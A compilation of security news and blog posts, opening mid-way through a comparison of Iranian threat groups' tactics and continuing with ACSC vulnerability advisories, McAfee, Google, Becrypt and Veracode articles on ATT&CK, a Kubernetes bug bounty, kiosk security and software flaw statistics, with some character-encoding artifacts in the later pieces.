According to MITRE: “MuddyWater is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group’s victims are mainly in the telecommunications, government (IT services), and oil sectors.” Currently we have few artifacts related to MuddyWater (‘Muddy’), indeed only Powerstats backdoor is actually attributed to it. Their attack are typically “hands driven”, which means they do not use automation lateral movement but they prefer to use opensource tools or sysinternal ones to deliberately move between target network rather than running massively exploits or scanners.

MuddyWater TTP

Once landed inside a victim machine Muddy looks for local credentials and then moves back and forward by using such a credentials directly on the network/domain controllers. According to MITRE techniques (green) MuddyWater to take an entire target-network might take few months but the accesses are quite silent and well obfuscated. Again it looks like we are facing a group which doesn’t need advanced exploitation activities but rather than advanced IT knowledge in order to move between network segments and eventual proxies/nat.

APT33

According to MITRE: “APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.” Analyzing the observed TTPs we might agree that this threat actor looks very close to MuddyWater. If you take a closer look to the Muddy Graph (in the previous dedicated section) and APT33 graph (following) you will see many similarities: many tools are shared, many techniques are shared and even artifacts Powerstats (Muddy) and Powertron (APT33) share functions and a small subset of code (even if they have different code bases and differ in functionalities). We have more information about APT33 if compared to MuddyWatter, but similarities on TTPs could induce an avid reader to think that we might consider APT33 as the main threat actor while MuddyWater a specific ‘operation’ of the APT33 actor.

APT33 TTP

But if you wonder why I decided to keep them separated on such personal and preliminary analysis you could find the answer in the reason in why they do attack. APT33 showed destruction intents by using Malware such as shamoon and stoneDrill, while Muddy mostly wants to “backdooring” the victims.

CopyKittens

According to MITRE: “CopyKittens is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.” CopyKittens threat actor actually differ from the previous ones. First of all we see the usage of CobaltStrike, which is an autonomous exploiting system (well actually is much more, but let me simplify it). Cobalt and Empire (a post exploitation framework) taken together would allow the attacker to automate lateral movement. Which is a damn different behavior respect to previous actors. CopyKittens would make much more noise inside an attacked network and would be easier to detect if using such automation tools, but on the other hand they would be much more quick in reaching their targets and run away.

CopyKittens TTP

One more characteristic is the “code signing”. While in OilRig, MuddyWater and APT33 we mostly observed “scripting” capabilities, in CopyKittens we are observing most advanced code capabilities. Indeed code signing is used on Microsoft Windows and IOS to guarantee that the software comes from known developer and that it has not been tampered with. While a script (node, python, AutoIt) could be attribute to IT guys as well as developers, developing more robust and complex software ( such as: java, .net, c++, etc) is a skill typically attributed to developers. This difference could be significant in suspecting a small set of different people working on CopyKittens.

Cleaver

According to MITRE: “Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. [1] Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). ” We have few information about this group, and as you might see there are few similarities. The usage of Mimikatz could be easily adopted for credential dumping, while TinyZBot is a quite interesting tool since it mostly implements spying capabilities without strong architectural design or code execution or data exfiltration.

Cleaver TTP

Just like Charming Kitten (which is not included into this report since it is a quite ongoing mistery even if a great report from Clear Sky is available), Cleaver is a threat group that is responsible of one of the first most advanced and silent cyber attack attributed to Iran known until now (OpCleaver, by Cylance). Cleaver attack capabilities are evolved over time very quickly and, according to Cylance, active since 2012. They look like to have infiltrated some of the world economic powers (ref: here) such as: Canada, China, England, France, Germany, India, Israel, Kuwait, Mexico, Pakistan, Qatar, Saudi Arabia, South Korea, Turkey, United Arab Emirates, and the United States. In the very first page of the OpCleaver report, the author writes that Cleaver is one of the most advanced threat actors ever. Even if I might agree with Cylance, I personally do not have such evidences so far, so I personally cannot compare Cleaver threat actor to the previus ones.

Threat Actors Comparison

Here comes the fun ! How about taking all these graphs and compare them ? Common references would highlight similarities, scopes and common TTPs and fortunately we might appreciate them in the following unique network diagram. You might spend over 20 minutes to check details on the following graph and I might decide to write an essay over it, but I will not do it :D, I’d like focus on few but important thoughts.

The iper-connection between the analyzed groups (take a look to the following graph) could prove that those teams are really linked together. They share Techniques, Procedures, Tools and Infection Artifacts and everything we might observe looks like belonging with a unique meta-actor. We might agree that the meta-actor would be linked to the sponsorship nation and we might decide to consider some of those groups as operations. In other words we might consider an unique group of people that teams up depending of the ongoing operation adopting similar capabilities and tool sets.

Threat Actor Comparison

OilRig and APT33 are the most known groups attributed to Iran, they share many tools but they clearly have two different intent and two different code bases (writing about Malware). CopyKittens, for example, have been clustered more closed to APT33 while Muddywater looks like clustered straight at the middle of them. But if we closely analyze the purposes and the used Malware we might agree in aggregating Muddy close to APT33, actually the weight of shared code should be heavier compared to common tools or common techniques, but I did not represent such a detail into graphs.

However two different ‘code experience’ are observed. The first one mostly focused on scriptting (node, python, autoIT) which could underline a group of people evolving from IT department and later-on acquiring cyersecurity skills, while the second observed behavior is mostly oriented on deep development skills such as for example: Java, .NET and C++. On MuddyWater and APT33 side, the usage of scripting engines, the usage of powershell, and the usage of Empire framework tighten together, plus the lack of exploiting capabilities or the lack in developing sophisticated Malware could bring the analyst to think that those threat actors hit their target without the need of strong development capabilities. On the other hand OilRig, Cleaver and CopyKitten looks like to have more software developing skills and looks to be mostly focused on stealth operations.

Conclusion

In this post I wrote a preliminary and personal analysis of threat actors attributed by the community to Iran, comparing TTPs coming from MITRE and relations extracted from Malpedia. The outcome is a proposal to consider the numerous groups (OilRig, APT33, MuddyWater, Cleaver, etc..) as a primary meta-threat-actor and dividing them by operations rather real group.

Advisory 2020-002: Critical Vulnerabilities for Microsoft Windows Announced, Patch Urgently

On 15 January 2020 (AEDT), Microsoft released security patches for three critical and one important vulnerabilities in the Microsoft Remote Desktop Client, Remote Desktop Gateway and the Windows operating system. The ACSC recommends that users of these products apply patches urgently to prevent malicious actors from using these vulnerabilities to compromise your network.

MITRE ATT&CK™, What’s the Big Idea?

MITRE describes ATT&CK™ as “a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.”  While this is a fine definition, it helps to understand the significance this framework enables.

The tactics, techniques, and procedures (TTPs) represented in ATT&CK allow organizations to understand how adversaries operate.  Once you have this understanding, you can take measures to mitigate those risks.

So, in the end, ATT&CK is about risk management. 

                  Cycle of Mitigation

ATT&CK In Action

At the MITRE ATT&CKcon 2.0 conference, industry leaders from Nationwide presented on Using Threat Intelligence to Focus ATT&CK Activities.  They described the process of taking the larger ATT&CK Matrix and reducing it to a more contextual and manageable set of items they could action; to mitigate the most relevant vectors for their organization.

One great aspect of ATT&CK is that the data is available for all to see.  Leveraging the collective base of reports, we can build a prevalence view of the matrix.  As of January 2020, there were some 266 techniques, referenced across 449 actors and tools.

              MITRE ATT&CK™ Enterprise Treemap (October 2019)

Here we see that the Remote File Copy technique was used by 42% of the referenced actors and tools.  Indeed, this is an important and heavily used technique present in attacks carried out by various actors including APT3 and ATP38, as well as noteworthy malware attacks such as Shamoon and WannaCry, just to name a few.

MITRE ATT&CK Evaluation

In 2019, MITRE began evaluating security vendors using these techniques to measure their ability to See the activities of an adversary. The first evaluation, or Round 1, was based on an APT3 style attack, and included many of the items on the treemap above.  As you might expect, Remote File Copy was represented.  During the evaluation, MITRE copied a DLL to a remote system (something that the Petya malware does).  While several vendors were able to show telemetry for this action, thanks to MVISION EDR, McAfee was one of only two vendors that showed a Specific Behavior alert for this activity (see 7.B.1 on the technique comparison).  This designation reserved for the most descriptive of all detection categories.  (See Round 1 Detection Categories).  For more information on McAfee’s Round 1 results, see: MITRE ATT&CK™ APT3 Assessment

Putting It All Together

Having the necessary visibility into the actions taken by an attacker is a key component in understanding the risks an organization faces.  Armed with this information, a response can be carried out and a mitigation plan created and rolled out to thwart future attacks.

MITRE ATT&CK is a great advancement in enabling organizations to characterize and subsequently manage risk.

 

The post MITRE ATT&CK™, What’s the Big Idea? appeared first on McAfee Blogs.

The Top Technology Takeaways From CES 2020

Another Consumer Electronics Show (CES) has come and gone. Every year, this trade show joins practically everyone in the consumer electronics industry to show off the latest and greatest cutting-edge innovations in technology. From bendable tablets to 8k TVs and futuristic cars inspired by the movie “Avatar,” CES 2020 did not disappoint. Here are a few of the key takeaways from this year’s show:

Smart home technology is driven by convenience

As usual, smart home technology made up a solid portion of the new gadgets introduced at CES. Netatmo introduced the Netatmo Smart Door Lock and Keys which use physical NFC (meaning near field communication, a technology that allows devices to communicate with each other) keys as well as digital keys for guests. In the same realm of home security, Danby’s smart mailbox called the Parcel Guard allows couriers to deliver packages directly into the anti-theft box using a code or smartphone app.

Devices integrated with Alexa technology

CES 2020 also introduced many devices integrated with Alexa technology. Kohler debuted its Moxie showerhead, complete with an Alexa-enabled waterproof Bluetooth speaker. Along with the showerhead, Alexa was also built into a Dux Swedish luxury bed to help improve users’ bedtime routines.

Smart appliances

CES is usually graced with a handful of smart appliances, and this year was no different. Bosch partnered with the recipe and meal-planning app Chefling to showcase its high-tech Home Connect Refrigerator, which uses cameras to track which food items users have stocked and suggests recipes based on that information.

Mind-reading wearables translate thoughts into digital commands

CES featured several products that let users control apps, games, and devices with their minds. Companies have developed devices that can record brain signals from sensors on the scalp or devices implanted within the brain and translate them into digital signals. For example, NextMind has created a headset that measures activity in the visual cortex and translates the user’s decision of where to focus his or her eyes into digital commands. This technology could replace remote controls, as users would be able to change channels, mute, or pause just by focusing on triangles next to each command.

Another company focused on the brain-computer interface is BrainCo. This company debuted their FocusOne headband at CES this year, complete with sensors on the forehead measuring the activity in the frontal cortex. This device is designed to measure focus by detecting the subtle electrical signals that your brain is producing. These headbands are designed to help kids learn how to focus their minds in class. BrainCo also has a prosthetic arm coming to market later this year which detects muscle signals and feeds them through an algorithm that can help it operate better over time. What’s more, this device will cost less than half of an average prosthetic.

Foldable screens are still a work-in-progress

This year’s event was colored with folding screens. However, most of these devices were prototypes without proposed ship dates. A likely reason for the lack of confidence in these devices by their manufacturers is that they are unsure if the screens will be durable enough to sell. Some of these work-in-progress devices include Dell’s Concept Ori, Intel’s Horseshoe Bend, and Lenovo’s ThinkPad X1 Fold. Nevertheless, folding devices provide a new opportunity for manufacturers to play around with device forms, such as a phone that turns into a tablet.

Cybersecurity’s role in evolving technology

As consumer technology continues to evolve, the importance of securing these newfangled devices becomes more and more apparent. According to panelists from the CES session Top Security Trends in Smart Cities, by making products “smarter,” we are also making them more susceptible to hacking. For example, The McAfee Advanced Threat Research (ATR) team recently uncovered security flaws in multiple IoT smart home devices. The first is the Chamberlain MyQ Hub, a “universal” garage door automation platform that can be hacked to cause a user’s garage door to open unintentionally. The second is the McLear NFC Ring, a household access control device used to interact with NFC-enabled door locks, which can be cloned to gain access to a user’s home.

Keep cybersecurity a top priority

Although CES 2020 has introduced many new devices aimed at making users’ lives easier, it’s important to keep a secure home as a top priority as gadgets are brought into their lives. As new McAfee research has revealed, the majority of Americans today (63%) believe that they as the consumer are responsible for their security. This could likely be attributed to more Americans becoming aware of online risks, as 48% think it’s likely to happen to them. To feel confident bringing new technology into their homes, users are encouraged to proactively integrate online security into everyday life.

Need for increased cybersecurity protection

As the sun sets on another fabulous CES, it’s clear that technological innovations won’t be slowing down any time soon. With all of these new advancements and greater connectivity comes the need for increased protection when connected to the internet. All in all, CES 2020 showed us that as technology continues to improve and develop, security will play an ever-increasing role in protecting consumers online

Stay up to date

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post The Top Technology Takeaways From CES 2020 appeared first on McAfee Blogs.

Microsoft rolls out Windows 10 security fix after NSA warning

US agency revealed flaw that could be exploited by hackers to create malicious software

Microsoft is rolling out a security fix to Windows 10 after the US National Security Agency (NSA) warned the popular operating system contained a highly dangerous flaw that could be used by hackers. Reporting the vulnerability represents a departure for the NSA from its past strategy of keeping security flaws under wraps to exploit for its own intelligence needs.

The NSA revealed during a press conference on Tuesday that the “serious vulnerability” could be used to create malicious software that appeared to be legitimate. The flaw “makes trust vulnerable”, the NSA director of cybersecurity, Anne Neuberger, said in a briefing call to media on Tuesday.

Related: Skype audio graded by workers in China with 'no security measures'

Continue reading...

Securing open-source: how Google supports the new Kubernetes bug bounty



At Google, we care deeply about the security of open-source projects, as they’re such a critical part of our infrastructure—and indeed everyone’s. Today, the Cloud-Native Computing Foundation (CNCF) announced a new bug bounty program for Kubernetes that we helped create and get up and running. Here’s a brief overview of the program, other ways we help secure open-source projects and information on how you can get involved.

Launching the Kubernetes bug bounty program

Kubernetes is a CNCF project. As part of its graduation criteria, the CNCF recently funded the project’s first security audit, to review its core areas and identify potential issues. The audit identified and addressed several previously unknown security issues. Thankfully, Kubernetes already had a Product Security Committee, including engineers from the Google Kubernetes Engine (GKE) security team, who respond to and patch any newly discovered bugs. But the job of securing an open-source project is never done. To increase awareness of Kubernetes’ security model, attract new security researchers, and reward ongoing efforts in the community, the Kubernetes Product Security Committee began discussions in 2018 about launching an official bug bounty program.

Find Kubernetes bugs, get paid

What kind of bugs does the bounty program recognize? Most of the content you’d think of as ‘core’ Kubernetes, included at https://github.com/kubernetes, is in scope. We’re interested in common kinds of security issues like remote code execution, privilege escalation, and bugs in authentication or authorization. Because Kubernetes is a community project, we’re also interested in the Kubernetes supply chain, including build and release processes that might allow a malicious individual to gain unauthorized access to commits, or otherwise affect build artifacts. This is a bit different from your standard bug bounty as there isn’t a ‘live’ environment for you to test—Kubernetes can be configured in many different ways, and we’re looking for bugs that affect any of those (except when existing configuration options could mitigate the bug). Thanks to the CNCF’s ongoing support and funding of this new program, depending on the bug, you can be rewarded with a bounty anywhere from $100 to $10,000.

The bug bounty program has been in a private release for several months, with invited researchers submitting bugs and to help us test the triage process. And today, the new Kubernetes bug bounty program is live! We’re excited to see what kind of bugs you discover, and are ready to respond to new reports. You can learn more about the program and how to get involved here.

Dedicated to Kubernetes security

Google has been involved in this new Kubernetes bug bounty from the get-go: proposing the program, completing vendor evaluations, defining the initial scope, testing the process, and onboarding HackerOne to implement the bug bounty solution. Though this is a big effort, it’s part of our ongoing commitment to securing Kubernetes. Google continues to be involved in every part of Kubernetes security, including responding to vulnerabilities as part of the Kubernetes Product Security Committee, chairing the sig-auth Kubernetes special interest group, and leading the aforementioned Kubernetes security audit. We realize that security is a critical part of any user’s decision to use an open-source tool, so we dedicate resources to help ensure we’re providing the best possible security for Kubernetes and GKE.

Although the Kubernetes bug bounty program is new, it isn’t a novel strategy for Google. We have enjoyed a close relationship with the security research community for many years and, in 2010, Google established our own Vulnerability Rewards Program (VRP). The VRP provides rewards for vulnerabilities reported in GKE and virtually all other Google Cloud services. (If you find a bug in GKE that isn’t specific to Kubernetes core, you should still report it to the Google VRP!) Nor is Kubernetes the only open-source project with a bug bounty program. In fact, we recently expanded our Patch Rewards program to provide financial rewards both upfront and after-the-fact for security improvements to open-source projects.

Help keep the world’s infrastructure safe. Report a bug to the Kubernetes bug bounty, or a GKE bug to the Google VRP.

Securing Interactive Kiosks IoTs with the Paradox OS

Article by Bernard Parsons, CEO, Becrypt

Whether it is an EPOS system at a fast food venue or large display system at a public transport hub, interactive kiosks are becoming popular and trusted conduits for transacting valuable data with customers.

The purpose of interactive kiosks, and the reason for their increasing prevalence, is to drive automation and make processes more efficient. For many businesses and government departments, they are the visible and tangible manifestations of their digital transformation.

Kiosks are information exchanges, delivering data and content; ingesting preferences, orders and payments. With so much data going back and forth, there is huge value, however, wherever there is value you’ll find malicious and criminal activities seeking to spoil, subvert or steal it
.

Three categories of Cyber Threat
Kiosks are just the latest in a long line of data-driven objects that need protecting. At stake is the very heart (and public face) of digitally evolved organisations.

Threats to kiosks come in three principal forms:
  • Threats to system integrity – where kiosks are compromised to display something different. Losing control of what your kiosks look like undermines your brand and causes distress to customers. A recent example is of a well-known sportswear store in New Zealand, where a kiosk displayed pornography for 9 hours before employees arrived the next morning to disconnect it. 
  • Threats to system availability – where kiosks are compromised to display nothing. In other words, they go offline and, instead of displaying some kind of reassuring ‘out of order’ message, give the appearance of a desktop computer with frozen dialogue boxes or raw lines of code. Examples of this are all too common, but are typically characterised by ‘the blue screen of death’. 
  • Threats to system confidentiality – where kiosks show no outward signs of compromise, but are in fact collecting data illegally. Such attacks carry significant risk over and above creating nuisance or offence. Examples include one of the largest self-service food vending companies in the US suffering a stealthy attack whereby the payment card details and even biometric data gleaned from users at kiosks may have been jeopardised.
The challenge of curbing these threats is compounded by interactive kiosks’ great virtue: their connectedness. As with any Internet of Things (IoT) endpoint architecture, the potential routes for attack are numerous and could spread from attacks on a company’s internal network, stem from vulnerabilities in kiosk application software, or even result from a direct assault on the kiosk itself.

How Best Practice Regulatory Standards Apply to Kiosks
Regulatory compliance plays a part here, with the EU GDPR and NIS directive (ably supported by comprehensive guidance proffered via the UK NCSC Cyber Assessment Framework) compelling organisations to consider all parts of their endpoint estates with appropriate operational controls, processes and risk management approach in respect of – for example – patch management, privileged user access and data encryption.

Regulatory reforms are all well and good, but technology (AI, machine learning, blockchain, etc.) is evolving rapidly and organisations must be as proactive about the cybersecurity challenge as possible or risk falling behind the digital innovation curve.

Becrypt work with the UK Government and the National Cyber Security Centre (NCSC), to develop solutions in line with core objectives sought by NIS and other regulations, for use in public sector environments. At the same time, we are seeing private sector businesses increasingly coming under the sorts of cyberattacks more commonly associated with the public sector.

Paradox: The Secure, Linux-based OS for Interactive Kiosks
Government research has determined that the best way to mitigate threats to interactive kiosks, and safeguard wider digital transformation objectives, is to secure the kiosk operating system (OS).

Becrypt have developed in collaboration with NCSC, Paradox, a secure Linux-based OS and management platform for kiosks. Paradox incorporates a secure-by-design architecture, ensuring kiosks remain in a known healthy state, free of malware. For organisations concerned about the potential for attack, this provides absolute certainty that every time a machine is switched on, its OS and all its applications have not been compromised.

Likewise, another common concern with kiosks is managing hundreds or even thousands of geographically dispersed devices without being able to check on or remediate system health. Should it detect anything unusual, Paradox will automatically rollback to the last known good state, presenting a functioning system rather than an offline/unavailable one. This avoids the onset of ‘bluescreen’ failures and allows administrators to visualise and manage kiosks in an easy and low-cost way. Automated security and patch management further ensures that devices are always kept up-to-date.

Paradox is also a very lightweight OS, which shrinks the potential attack surface and ensures the entire kiosk estate is not susceptible to common exploits. It also carries a number of advanced security controls that make it more difficult to attack, such as a sandboxed user account for privilege escalation prevention. OS components are also mounted as ‘read-only’, thereby preventing persistent, targeted attacks.

Spurred on by consumer demand for deeper interactions and easier, more personalised experiences, the exponential growth in interactive kiosks is plain to see in public spaces everywhere. And as this shift encourages more private and public sector organisations to do more with their data, the onus is on all of us to protect it.

State of Software Security v10: 5 Key Takeaways for Developers

In case you missed it, this year we launched our 10th annual State of Software Security (SOSS X) report! Armed with a decade of data, the Veracode team analyzed 85,000 applications to study trends in fix rates, mounting security debt, shifts in vulnerability by language, and more.

What did we uncover? At the core of our research, we found there???s still a need for better remediation processes and more frequent security scans. But we also uncovered some best practices that are leading to significant application security improvements. Read on for a snapshot of key takeaways that can help set you and your organization up for AppSec success in 2020.

Most apps still don???t pass crucial compliance tests

OWASP Top 10 vulnerabilities and SANS 25 software errors represent consensus listings of the most critical flaws in the industry, and while we???ve seen some changes in compliance rates across past editions of our SOSS report, the 10-year trend shows us that things haven???t shifted much as of late. Today, 68 percent of apps fail to pass OWASP on initial scan (down from 77 percent in volume one of SOSS), and 67 percent of apps fail to pass SANS on initial scan ???the same figure in volume one as volume ten.

The fact that these common and serious vulnerabilities are still prevalent in code underscores the fact that we are not creating environments where developers can code securely. The absence of proper secure coding training, as well as the lack of access to the right tools, is clearly creating risk.

Android, PHP, iOS, and C++ have a high frequency of flaws

This year???s data analysis found that over 90 percent of Android, PHP, and iOS applications contain security flaws on initial scan. Ranking over 80 percent were C++, .NET, and Java, while Python and JavaScript came in with the lowest flaw rates.

Language Scans

Why do we see a higher rate of flaws in mobile languages? Perhaps the reason Android and iOS are two of the top offenders is that many mobile applications aren???t properly scanned before they???re uploaded to the Apple App Store and the Google Play Store.ツ?Benツ?Greenwald, Director of Software Engineering at Veracode, explains further:ツ?

???One reason Android and iOS applications may tend to have more security flaws on first scan is because mobile developers believe they are already covered. Developers might assume that Apple and Google thoroughly test apps before they???re released, or they rely on Apple and Google for testing under the assumption that a security infrastructure is already in place.???

This issue only further highlights the need for thorough internal and third-party testing processes to ensure that your applications are secure.

Language also adds yet another layer to the issue of unfixed flaws piling up on developer plates; the average security debt for PHP and C++ is massive compared to that of .NET, Android, Java, and JavaScript.

Language Flaw Debt

As two of the top languages for flaw rates, it makes sense that unchecked issues in PHP and C++ can spin out of control for development teams. So, what???s their deal? PHP???s start in the mid 90s came with a basic design that works well for smaller applications and beginners learning to code, but it has since been so widely adopted and stretched beyond its means that it is left highly vulnerable to flaws.

C++ is an incredibly robust language that powers many of the operating systems, browsers, and productivity apps that we use in our daily life. But with that great power comes the great responsibility to manage memory, guard against use-after-free, and keep stacks from exceeding the fill line. These flaws tend to accumulate over time and are easier to introduce than in many of the today???s more commonly used higher-level languages.

While some applications are prone to debt buildup because they use multiple languages or a basic flaw-heavy language like PHP, it???s important to consider the steps your team can take to counterbalance the prevalence of flaws???like reprioritization.ツ?

Remediation priorities are misaligned for top vulnerabilities

Out of the 85,000 applications tested (including 1.4 million individual scans), our data shows that 83 percent of apps have at least one flaw when they???re initially scanned. That???s an 11 percent increase from volume one to volume ten of the SOSS report - but the good news is we also saw an overall 14 percent decrease in applications with high-severity flaws.

The bad news? Focus is, it seems, not always placed on fixing the right flaws. For example, we found that A10-Logging is ranked the lowest in flaw prevalence but is at the top of the list for fix rate, the bottom of the list for incidents, and doesn???t rank for exploit risk. A5-Access Control is another mystifying trend. It ranks low in prevalence but towards the top of exploit and incident rankings, falling right in the middle of the list for fix rate.

Some flaws and fixes are consistent, though. Both A1-Injection and A2-Authentication sit toward the top of the list across the board, while A8-Deserialization is reliably stable in the bottom half of each category. This discrepancy sheds some light on which flaws are neglected, deferred, targeted, and prioritized, and how DevOps teams can more efficiently rank issues.

Flaws that can be remediated quickly on a small scope are naturally resolved ahead of flaws that are slightly more complicated, but often those severe issues are less difficult to fix, underscoring the need for a more comprehensive plan of attack.

Developers favor recency, adding to security debt

SOSS X shows us that developers typically follow a LIFO (Last In, First Out) method instead of a FIFO (First In, First Out) approach. With LIFO, developers run the risk of contributing to security debt when older flaws are stacked underneath newer issues. As time goes by, the probability of remediation drops significantly, and any unmitigated remnants slide into the land of security debt.

This trend highlights an ongoing battle with security debt across the industry and draws attention to how it muddies the waters of remediation. Fortunately, we have revealing data on scanning cadence that can help reduce an organization???s debt over time.

Bursty scans contribute to security debt???but it???s reversible

We mention security debt throughout the SOSS X report (and this post) because it can leave organizations vulnerable to attacks in the backlog of flaws, and slower to mitigate issues that arise out of the blue.

The good news is, this year we also uncovered evidence of practices that are chipping away at security debt. It???s all about scanning frequency. We know that ???bursty??? scanning cadences result in a higher prevalence of flaws over time, as opposed to steady and early scan processes with fewer flaws open at once. Sometimes bursty scanning simply fits your waterfall development cycle or pairs with testing schedules that are event-driven, but this can leave security holes where flaws are missed month to month.

Bursty Scans

Based on our data, we know that development teams can improve their median time to remediation (MedianTTR) by about 70 percent with established procedures and consistent testing schedules. Automating your processes to increase scanning tempo and improve prioritization reduces the security debt that your organization carries.

Read the report

Want to see all this data in one complete package? Read the full SOSS report to learn more about the state of DevSecOps, discover additional data highlights by industry, and more.

Advisory 2020-001-4: Active exploitation of critical vulnerability in Citrix Application Delivery Controller and Citrix Gateway

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) is aware of ongoing attempts to exploit a critical vulnerability in Citrix Application Delivery Controller (ADC) (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway) and Citrix SD-WAN WANOP. The vulnerability, known as CVE-2019-19781, was disclosed on 17 December 2019 and enables an unauthenticated adversary to execute arbitrary code.

Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset  

digital minimalism

Editor’s Note: This is part II of a series on Digital Minimalism in 2020.

Is this the year you rethink and rebuild your relationship with technology? If so, embracing digital minimalism may be the most powerful way to achieve that goal.

We learned last week in our first post on this series tht digital minimalism isn’t about chucking your devices and going off the grid. It’s about being hyper intentional that your technology choices support the things you value.

And, as outlined by Cal Newport in his book, Digital Minimalism: Choosing a Focused Life in a Noisy World, the first step in the process is clarifying your values. Your values are the guiding principles that motivate you and give your life meaning such as family, education, work/life balance, community service, friendship, integrity, health, or wealth. With values clearly defined, you can evaluate every piece of technology, app, or social network you use to be sure it aligns with those values.

For instance, if you establish your top values to be family and volunteering, then maybe it’s time to let go of all the podcasts, apps, and email subscriptions that no longer support those priorities. The online social communities you habitually peruse may trigger anxiety and be taking time from activities that could be far more fulfilling.

If you get overwhelmed amid your technology pruning, come back to these two critical questions:

  • Does this technology directly support something that I deeply value?
  • Is this technology the best way to support this value?

digital minimalism

 

 

There’s a ton of great information as well as passion online around the concept of digital minimalism. But to keep this new idea “minimal” and easy to grasp, we’ve chosen 5 things you can do today to help you and your family jumpstart this new way of thinking.

5 ways to jumpstart a ‘digital minimalist’ mindset

  1. Make social accounts private. Last week we suggested cutting all non-essential media for 30 days. Another way to mentally shift into a minimalist mindset is to transition your social media accounts from public to private if you haven’t already. Not only will this small change increase your online privacy, but it could also help you become more aware of the amount of content you share, the people with whom you share it, and the value of what you share. For people who post frequently (and often out of habit), this may prove to be a game-changer. The goal of digital minimalism isn’t a digital detox or white-knuckling no-or-less-tech life. The goal is to consciously, willingly, and consistently be rebuilding your relationship with technology into a formula that decreases distraction and increases value.
  2. Audit those apps! Want to feel a rush of minimalist adrenaline? Whack some apps! Most of us have amassed a galaxy of apps on our phones, tablets, and laptops. Newport suggests getting rid of any apps or devices that continuously distract and are “outside of work.” Those brain games, cooking apps, calorie trackers, and delivery apps you rarely use or value, may no longer be relevant to your values. Some will find this exercise exhilarating, while others may feel panicked. If that’s the case, pace yourself and delete a handful of apps over the next few weeks. The goal is more peace, not panic. On a security note: Remember, apps are one of the main channels for malware. Consider adding security software to your family devices, reading app reviews, and only downloading trusted products.
  3. Reclaim your space. Do you carry your phone with you into restaurants, upstairs, on a walk, and even to the bathroom? If so, this step may be especially tricky but incredibly beneficial. Think about it — you weren’t born with a phone. Over the years, it became a companion, maybe even an extra appendage. So start small to reclaim your birthright to phone-free space. If you go outside to walk your dog, leave your phone inside. Are you headed into a restaurant? Leave the phone in the car. Newport also suggests leaving your phone in a fixed spot in your home and treating it like the “house phones” of the past. When you go to bed, leave your phone in another room. Over time, hopefully, these small changes will add more hours, sleep, relaxation, conversation, and contemplation to your day.
  4. Condense home screens, turn off all notifications. Clutter — especially digital clutter — can trigger feelings of chaos and anxiety. By creating folders for random files and apps on your laptop, tablet, and phone, you can declutter and breathe a little easier. If later you can’t find a document, use the search tool on your device. Also, turn off all notifications, including your phone ringer, to reduce interruptions and to avoid the temptation to phub (phone snub) the person in front of you.
  5. Replace device time with more productive activities. The pain and regret of the social media time suck are very real. We lose days, even years going down digital rabbit holes and getting emotionally invested in random social media posts and exchanges. Some ideas: If you are a night scroller, opt to read a physical book. If you take breaks to scroll during work hours, put your phone in a drawer — out of sight, out of mind. If you’ve defined “relaxing” as curling up with your coffee and phone and reading through social feeds, reclaim those hours by calling a friend, taking a walk, connecting with your family, reading, or getting outside.

Embracing a new mindset, especially when it comes to our sacred technology habits, won’t be an easy task. However, if you know (and yes, you do know) that technology is taking up too much of your time, attention, and emotional bandwidth, then 2020 may the perfect time to release digital distractions, rethink your technology choices, and reclaim the things that matter most.

The post Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset   appeared first on McAfee Blogs.

The Consequences of Security Breaches Are Becoming More Severe

With the prevalence of cyberattacks, breaches, and data leaks heading into 2020, it???s becoming commonplace for employees to part ways with their organization after a security incident. Although the consequences from a breach were less severe in the past, reactions are shifting as data leaks are deemed more dire than ever before.

A 2018 report from Kaspersky Lab surveyed 6,000 people in 29 countries and found that, globally, 31 percent of cybersecurity incidents resulted in the layoff of employees at impacted companies. In roughly a third of these cases, those employees holding senior IT positions were most often let go from their roles after a breach or security incident.

The results from Kaspersky???s survey also revealed that 32 percent of C-level managers and CEOs in the United States were laid off post-breach. That number is lower in other countries but still higher overall than most functional roles within and outside of IT, representing a growing trend in how organizations respond to breach backlash. As cybersecurity professionals are in high-demand and C-level managers cost a pretty penny, making the decision to part ways is not always easy.

Weathering the post-breach storm

With great power comes great responsibility. In 2017, the CIO of Equifax U.S. Information Solutions, Jun Ying, was sent to jail and forced to pay $55,000 for insider trading after it was discovered that he shared information about a breach before it was made public by the company. In the same year, Uber???s CSO Joe Sullivan was let go after he allegedly helped cover up a bug bounty pay-out for over $100,000, paying attackers in exchange for the deletion of stolen data on 57 million drivers and passengers. Both Sullivan and security lawyer Craig Clark were fired from the company.

Sometimes privacy-minded employees clash with their own organization???s policies and can eliminate a role altogether. For example, Facebook???s former CSO, Alex Stamos, left a security role at the social media powerhouse after he allegedly disagreed with how Facebook handled the very public Cambridge Analytica scandal. In 2018, Facebook made the decision not to replace Stamos and to instead rely on introducing security engineers, analysts, investigators, and other specialists into their engineering and product teams. It was a testament to how fast things can change within an organization???s security team.

In other situations, ex-employees can cause unanticipated headaches with ripple effects of their own. Capital One fell prey to cyberattacker Paige Thompson when she infiltrated the company???s third-party cloud server to access 106 million customer records in 2019. Thompson, previously an Amazon Web Services software engineer, allegedly built a scanning tool that looked for misconfigured cloud servers on the web providing easy access to username and password credentials.

These examples lead to a logical question: if your business is unable to fortify its internal processes and protect sensitive information, is it trustworthy to consumers? With a solid plan for security and remediation in place, the risk of job loss and consumer distrust diminishes.

Getting serious about your security

As breaches and cyberattacks lead to high-profile firings that play out in the media, the public is paying attention. A recent IDG Survey Report, Security as a Competitive Advantage, found that 66 percent of respondents are more likely to work with a vendor whose application security has been validated by an established, independent expert.

